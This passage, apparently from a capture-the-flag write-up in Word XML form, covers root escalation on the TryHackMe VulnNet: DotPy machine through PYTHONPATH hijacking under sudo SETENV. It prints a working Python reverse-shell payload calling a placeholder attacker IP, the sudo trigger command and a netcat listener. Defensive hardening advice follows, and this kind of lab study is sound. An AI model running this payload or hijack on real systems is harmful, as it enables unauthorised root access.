              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Security principle</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Any sudo rule that permits running a package manager, interpreter, editor, or archiving tool as another user — even with a restricted command path — is almost always exploitable, because these “Living off the Land” binaries (LOLBins) have built-in extension mechanisms (setup.py hooks, plugins, macros, “edit and save” escapes) that were never designed with sudo trust boundaries in mind. The wildcard argument (install *) compounds the issue by allowing arbitrary package sources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Privilege Escalation #2: system-adm → root (PYTHONPATH / module hijacking)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Enumeration</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo -l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">User system-adm may run the following commands on vulnnet-dotpy:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    (ALL) SETENV: NOPASSWD: /usr/bin/python3 /opt/backup.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The keyword SETENV is the critical detail: it explicitly permits the user to pass custom environment variables through sudo when running this command, instead of sudo resetting the environment to a safe default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/opt/backup.py imports several standard-looking modules, including zipfile — a real Python standard-library module, but one that Python's import system will search for using the module search path (sys.path), which is influenced by the PYTHONPATH environment variable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Because SETENV allows PYTHONPATH to be forwarded through sudo, an attacker-controlled directory can be placed at the very front of Python's module search path. If that directory contains a file named zipfile.py, Python will import the attacker's file instead of the genuine standard-library zipfile module — because Python resolves imports by searching sys.path in order, and a custom PYTHONPATH entry is searched before the standard library location.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A malicious zipfile.py was placed in /dev/shm containing a reverse-shell payload that executes on import:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># /dev/shm/zipfile.py</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">import socket,subprocess,os</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">s.connect(("&lt;attacker-ip&gt;", 1337))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">subprocess.call(["/bin/sh","-i"])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo PYTHONPATH=/dev/shm python3 /opt/backup.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When /opt/backup.py executed its “import zipfile” statement, Python located /dev/shm/zipfile.py first (because /dev/shm was prepended to the search path) and executed it instead of the legitimate module — as root, since the entire sudo command runs with root privileges. This returned a shell owned by root on the prepared listener.</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nc -nvlp 1337</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># ...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C00000" w:sz="4"/>
          <w:left w:val="single" w:color="C00000" w:sz="24"/>
          <w:bottom w:val="single" w:color="C00000" w:sz="4"/>
          <w:right w:val="single" w:color="C00000" w:sz="4"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Security principle</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">This is a module/library (“DLL”) hijacking attack applied to Python: whenever a privileged process's import search path can be influenced by a lower-privileged user — through PYTHONPATH, a writable directory earlier in sys.path, or an unqualified import of a same-named module — the attacker can substitute their own code for a trusted library. The sudo SETENV flag is the root cause here: it allows the environment (and therefore the import search path) to cross the privilege boundary along with the command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Attack Chain Summary</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3000"/>
        <w:gridCol w:w="7000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="2F5496" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="2F5496" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique / Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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Nmap fingerprint → Werkzeug/Flask on port 8080/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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Account registration → SSTI discovery in Jinja2 → hex-encoded filter bypass → RCE → reverse shell as “web”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">PrivEsc #1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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Unrestricted sudo “pip3 install *” → malicious setup.py → shell as “system-adm” (user flag)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">PrivEsc #2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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sudo SETENV on python3 backup.py → PYTHONPATH hijack of zipfile module → shell as root (root flag)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Defensive Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Web Application (SSTI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never construct templates by concatenating raw user input into a template string; always pass user data as a context variable to render_template(), never into render_template_string() built from request data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use Jinja2's sandboxed environment (jinja2.sandbox.SandboxedEnvironment) as defense-in-depth — note this reduces but does not eliminate SSTI risk, as sandbox escapes exist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not rely on blacklisting characters or substrings as the primary defence; attackers can trivially bypass blacklists using encoding, filters like attr(), or alternate syntax. Prefer strict allow-listing of expected input and context-aware output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the application behind a production WSGI server (gunicorn/uWSGI) with DEBUG=False, never the Werkzeug development server, in any production or internet-facing deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 Sudo / Privilege Escalation Hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avoid granting sudo rights to interpreters, package managers, or any GTFOBins-listed binary, even scoped with wildcards — treat “pip3 install *” as equivalent to full code execution as the target user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never combine SETENV with commands that consult environment-influenced search paths (PYTHONPATH, PATH, LD_PRELOAD, PERL5LIB, etc.). If environment forwarding is required, use env_keep with an explicit, minimal allow-list instead of SETENV.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pin scripts run via sudo to use absolute imports and, where possible, execute with the -I (isolated mode) or -E-stripped flags to ignore PYTHONPATH and other environment-based import influences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regularly audit sudo -l output for all users as part of routine hardening and periodic penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TryHackMe — VulnNet: DotPy room: https://tryhackme.com/room/vulnnetdotpy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PortSwigger Web Security Academy — Server-side template injection: https://portswigger.net/web-security/server-side-template-injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HackTricks — SSTI (Server Side Template Injection): https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
